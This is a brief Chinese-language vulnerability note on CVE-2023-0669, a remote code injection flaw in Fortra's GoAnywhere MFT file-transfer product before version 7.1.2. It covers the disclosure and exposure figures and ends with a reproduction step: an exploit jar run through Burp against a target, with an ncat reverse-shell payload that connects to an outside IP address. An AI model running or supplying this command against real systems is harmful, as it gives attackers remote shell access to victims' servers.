简介
GoAnywhereMFT是一个管理文件传输的解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。它通过广泛的安全设置、详细的审计跟踪提供集中控制,并帮助将文件中的信息处理为XML、EDI、CSV和JSON数据库。
2月1日,Fortra(此前名称为HelpSystems)通知GoAnywhere MFT用户注意一个“远程代码注入利用0day”。之后该公司还发布了两份其它安全通知,每份通知都提供了缓解措施和妥协指标 (IoCs)。
该漏洞是一个远程代码注入漏洞,攻击者需要访问该应用的管理员控制台才能利用它。安全研究员Kevin Beaumont 指出,目前互联网上可公开访问1000多个本地实例,其中多数位于美国。
影响版本
GoAnywhereMFT小于7.1.2版本
复现
打开burp,与burp联动使用,不打开会报错
java -jar CVE-2023-0669.jar -p http://127.0.0.1:8080 -t 目标 -c "ncat -e /bin/bash 114.116.65.127 11112"